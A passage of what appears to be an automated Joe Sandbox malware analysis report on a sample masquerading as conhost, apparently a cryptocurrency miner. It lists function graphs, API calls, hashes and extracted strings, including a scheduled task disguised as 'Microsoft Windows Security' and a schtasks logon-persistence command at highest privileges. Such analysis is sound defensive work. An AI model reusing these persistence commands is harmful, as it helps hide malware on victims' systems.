                                                                                                                                                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$CCG $CCG!$CCG!$CCG"
                                                                                                                                                                                                                                                    • API String ID: 4140830120-965913644
                                                                                                                                                                                                                                                    • Opcode ID: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                                                                                                                                                    • Instruction ID: 5276c897c9baac8f656a5aaf7af20750943194ee674402790a76e761a43f9066
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A51AD32A08A8182E7608F19E4447A97370FB99B99F505236FECE63B58DF3DD591C740

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 544 7ff6ce1fc2e0-7ff6ce1fc30b 545 7ff6ce1fc311-7ff6ce1fc32b strncmp 544->545 546 7ff6ce1fc708-7ff6ce1fc712 544->546 547 7ff6ce1fc331-7ff6ce1fc366 545->547 548 7ff6ce1fc686-7ff6ce1fc68f 545->548 546->545 549 7ff6ce1fc718 546->549 550 7ff6ce1fc42b-7ff6ce1fc495 strlen 547->550 548->547 551 7ff6ce1fc695-7ff6ce1fc6a3 548->551 549->547 552 7ff6ce1fc71d 550->552 553 7ff6ce1fc49b-7ff6ce1fc4e5 call 7ff6ce1fe3d0 * 2 550->553 551->547 554 7ff6ce1fc6a9-7ff6ce1fc6af 551->554 558 7ff6ce1fc71f-7ff6ce1fc732 552->558 563 7ff6ce1fc370-7ff6ce1fc373 553->563 564 7ff6ce1fc4eb-7ff6ce1fc4ee 553->564 555 7ff6ce1fc6b1-7ff6ce1fc6b3 554->555 556 7ff6ce1fc6b9-7ff6ce1fc6c0 554->556 555->547 555->556 556->547 559 7ff6ce1fc6c6-7ff6ce1fc6d3 556->559 559->547 565 7ff6ce1fc640-7ff6ce1fc650 call 7ff6ce1f4e50 563->565 566 7ff6ce1fc379-7ff6ce1fc385 563->566 567 7ff6ce1fc4f4-7ff6ce1fc500 564->567 568 7ff6ce1fc417-7ff6ce1fc41b 564->568 577 7ff6ce1fc658-7ff6ce1fc66a 565->577 572 7ff6ce1fc391-7ff6ce1fc3a0 strlen 566->572 573 7ff6ce1fc387-7ff6ce1fc38b 566->573 567->568 574 7ff6ce1fc506-7ff6ce1fc518 567->574 569 7ff6ce1fc733 568->569 570 7ff6ce1fc421-7ff6ce1fc428 568->570 575 7ff6ce1fc735-7ff6ce1fc738 569->575 570->550 578 7ff6ce1fc6fc-7ff6ce1fc700 572->578 579 7ff6ce1fc3a6-7ff6ce1fc3bf 572->579 573->572 573->577 580 7ff6ce1fc51e-7ff6ce1fc520 574->580 581 7ff6ce1fc6ec-7ff6ce1fc6f4 call 7ff6ce1f7190 574->581 575->558 583 7ff6ce1fc66c-7ff6ce1fc66e 577->583 584 7ff6ce1fc6d8-7ff6ce1fc6e7 call 7ff6ce1f7190 577->584 578->546 579->578 585 7ff6ce1fc3c5-7ff6ce1fc3e1 579->585 580->581 586 7ff6ce1fc526-7ff6ce1fc541 call 7ff6ce1f7c00 580->586 581->578 583->584 589 7ff6ce1fc670-7ff6ce1fc681 call 7ff6ce1f7c00 583->589 590 7ff6ce1fc3e5-7ff6ce1fc406 call 7ff6ce1f4140 strlen 584->590 585->590 598 7ff6ce1fc40a-7ff6ce1fc40d 586->598 599 7ff6ce1fc547-7ff6ce1fc549 586->599 589->590 590->598 598->568 600 7ff6ce1fc40f-7ff6ce1fc411 598->600 599->598 601 7ff6ce1fc54f 599->601 600->568 603 7ff6ce1fc73a-7ff6ce1fc7d0 call 7ff6ce1f44c0 600->603 602 7ff6ce1fc550-7ff6ce1fc568 601->602 604 7ff6ce1fc894-7ff6ce1fc89b 602->604 605 7ff6ce1fc56e-7ff6ce1fc571 602->605 614 7ff6ce1fc7d2 603->614 615 7ff6ce1fc7dc-7ff6ce1fc883 call 7ff6ce1fe3d0 * 2 call 7ff6ce1faf20 603->615 607 7ff6ce1fc8a1-7ff6ce1fc8a4 604->607 608 7ff6ce1fc57f-7ff6ce1fc587 604->608 605->604 609 7ff6ce1fc577-7ff6ce1fc579 605->609 607->608 611 7ff6ce1fc8aa-7ff6ce1fc8b0 607->611 613 7ff6ce1fc599-7ff6ce1fc5b1 608->613 609->608 612 7ff6ce1fc888-7ff6ce1fc88f 609->612 616 7ff6ce1fc5c0-7ff6ce1fc5c2 611->616 612->598 617 7ff6ce1fc5b3-7ff6ce1fc5b5 613->617 618 7ff6ce1fc590-7ff6ce1fc595 613->618 614->615 615->575 622 7ff6ce1fc5c4-7ff6ce1fc5ce 616->622 623 7ff6ce1fc5fd-7ff6ce1fc628 call 7ff6ce1f4240 call 7ff6ce1f4140 616->623 617->618 620 7ff6ce1fc5b7 617->620 618->613 620->616 622->623 625 7ff6ce1fc5d0-7ff6ce1fc5e2 622->625 623->598 636 7ff6ce1fc62e-7ff6ce1fc631 623->636 625->616 629 7ff6ce1fc5e4 625->629 632 7ff6ce1fc5e8-7ff6ce1fc5f7 629->632 632->632 635 7ff6ce1fc5f9-7ff6ce1fc5fb 632->635 635->622 635->623 636->602
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strlenstrncmp
                                                                                                                                                                                                                                                    • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                                                                                                                                                                                    • API String ID: 1310274236-662103887
                                                                                                                                                                                                                                                    • Opcode ID: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                                                                                                                                                    • Instruction ID: b423c4d6ca8ed56bf2e7fa2945396b1fe814a9e7e9895efde33a2d8ac62f71b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFE1F472A086C289F7208F3194143FD3BB1BB15B9AF444131EA9CABB85DF3CD6569784

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 638 7ff6ce1fdb76-7ff6ce1fdb9b 639 7ff6ce1fdba1-7ff6ce1fdba6 638->639 640 7ff6ce1fdcf0-7ff6ce1fdcf4 638->640 642 7ff6ce1fdc03-7ff6ce1fdc08 639->642 643 7ff6ce1fdba8-7ff6ce1fdbad 639->643 640->639 641 7ff6ce1fdcfa 640->641 644 7ff6ce1fdc50 641->644 645 7ff6ce1fdcc5-7ff6ce1fdcd5 call 7ff6ce206698 642->645 646 7ff6ce1fdc0e 642->646 647 7ff6ce1fdc22-7ff6ce1fdc32 signal 643->647 648 7ff6ce1fdbaf-7ff6ce1fdbb4 643->648 655 7ff6ce1fdc55-7ff6ce1fdc5a 644->655 652 7ff6ce1fdcd7-7ff6ce1fdcda 645->652 669 7ff6ce1fdd10-7ff6ce1fdd24 signal 645->669 649 7ff6ce1fdc60-7ff6ce1fdc65 646->649 650 7ff6ce1fdc10-7ff6ce1fdc15 646->650 651 7ff6ce1fdc38-7ff6ce1fdc4c signal call 7ff6ce1fd530 647->651 647->652 648->644 654 7ff6ce1fdbba 648->654 649->644 663 7ff6ce1fdc67-7ff6ce1fdc6c 649->663 650->644 656 7ff6ce1fdc17-7ff6ce1fdc1c 650->656 651->644 661 7ff6ce1fdcae-7ff6ce1fdcb8 652->661 662 7ff6ce1fdcdc-7ff6ce1fdce8 652->662 659 7ff6ce1fdca0-7ff6ce1fdca5 654->659 660 7ff6ce1fdbc0-7ff6ce1fdbc5 654->660 656->647 656->661 664 7ff6ce1fdc6e-7ff6ce1fdc7e signal 659->664 665 7ff6ce1fdca7-7ff6ce1fdcac 659->665 660->644 670 7ff6ce1fdbcb-7ff6ce1fdbd0 660->670 666 7ff6ce1fdd00-7ff6ce1fdd07 661->666 667 7ff6ce1fdcba-7ff6ce1fdcc1 661->667 662->655 663->661 663->664 672 7ff6ce1fdc84-7ff6ce1fdc87 664->672 673 7ff6ce1fdd29-7ff6ce1fdd3b signal 664->673 665->644 665->661 667->645 669->655 670->661 674 7ff6ce1fdbd6-7ff6ce1fdbe6 signal 670->674 672->661 677 7ff6ce1fdc89-7ff6ce1fdc95 672->677 673->655 675 7ff6ce1fdd40-7ff6ce1fdd52 signal 674->675 676 7ff6ce1fdbec-7ff6ce1fdbef 674->676 675->655 676->661 678 7ff6ce1fdbf5-7ff6ce1fdc01 676->678 677->655 678->655
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: signal
                                                                                                                                                                                                                                                    • String ID: CCG
                                                                                                                                                                                                                                                    • API String ID: 1946981877-1584390748
                                                                                                                                                                                                                                                    • Opcode ID: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                                                                                                                                                    • Instruction ID: e692945289ce41b9fd8d9a8eca4b562ae91624dd73c7f885053cab1abb0c76f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB41A560E3C10305FB782D78446037811B15FE6B26F994A3DF5AEE7BD1CD9DB8A05292
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: QueryVirtual
                                                                                                                                                                                                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                                                    • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                                                    • Opcode ID: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                                                                                                                                                    • Instruction ID: cc9999128567b90f842c6dfda047476f9347f41262ebb04d11694404993c07d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF613172B1868286EB108F51E9407B977B1BB64BA6F044134FECDA7B90EE3CE955C340
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fwprintf
                                                                                                                                                                                                                                                    • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                                                                                                                    • API String ID: 968622242-2115465065
                                                                                                                                                                                                                                                    • Opcode ID: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                                                                                                                                                    • Instruction ID: 0a3d17bd7bd54759098a2b178c89266d720386771c46b15cb42dd68d83c6b191
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7441D573F1828286F7618E15D61077977B1ABA0BA6F188130FE8E976C5DF3CE4418B00
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %*.*s$%-*.*s$%.*s$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
                                                                                                                                                                                                                                                    • API String ID: 0-2632607494
                                                                                                                                                                                                                                                    • Opcode ID: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                                                                                                                                                    • Instruction ID: e74c7ad40d1b15703e4f9428ce0de3265cfceabeed56faf587062ee44c5bd2d6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C41D873A182CA85E7609F65C62077977B1FB60795F18C134FE8EAB6C5EE6CA440CB00
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memsetwcscatwcscpywcslen
                                                                                                                                                                                                                                                    • String ID: \??\$eth
                                                                                                                                                                                                                                                    • API String ID: 468205783-1480138707
                                                                                                                                                                                                                                                    • Opcode ID: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                                                                                                                                                    • Instruction ID: 8653e684fd687e59fac3ef0fae4965e74dd20b514ac885628b62f794023aeb51
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C31CD61A1878284F7209F61EA113B53771BF65789F048235F9CCE7BA1EF2DE5858300
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00007FF6CE214958,00007FF6CE214950,00007FF6CE213E20,00007FFEFE3AADA0,?,?,?,00000001,00007FF6CE1F124C), ref: 00007FF6CE1FD96D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6CE1FD5B0: VirtualQuery.KERNEL32 ref: 00007FF6CE1FD65B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF6CE1FDAEA
                                                                                                                                                                                                                                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6CE1FDB03
                                                                                                                                                                                                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6CE1FDB12
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$ProtectQuery
                                                                                                                                                                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                                                                                                                    • API String ID: 1027372294-1286557213
                                                                                                                                                                                                                                                    • Opcode ID: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                                                                                                                                                    • Instruction ID: 299272ef180815057e217a4b79c6b9a7101de02b3f872e238b3a3dd905664858
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0691F022F28A4285FB208F2195007793771BF65BAAF544235ED9DA7BC4DE3DE451C780
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freememcpystrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2208669145-0
                                                                                                                                                                                                                                                    • Opcode ID: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                                                                                                                                                    • Instruction ID: 61202e866ab970edc9b2d49145392c7902b0514f348c1ad96c74e605457a4b93
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31B272A2D68345FA625E116A0037992716FB0FE2F194231FEDDA7FC8DE3CE5518280
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Byte$CharLeadMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2561704868-0
                                                                                                                                                                                                                                                    • Opcode ID: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                                                                                                                                                    • Instruction ID: 29b833e120046e07c017529825a30ef01ce45cc4a5f9dbd31f140887bf7a5322
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8731B772A0C2D18AE3604F25B5107AD76B0BBA0B55F588135FAC8D7BD5CF3DD5458B80
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: wcscpywcslen
                                                                                                                                                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$xmr
                                                                                                                                                                                                                                                    • API String ID: 225642448-2694755926
                                                                                                                                                                                                                                                    • Opcode ID: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
                                                                                                                                                                                                                                                    • Instruction ID: 2254ecf66b8a9adfd5bb64b48e645b8b4cb061fcfd3107b1f913d3fffd67e1bc
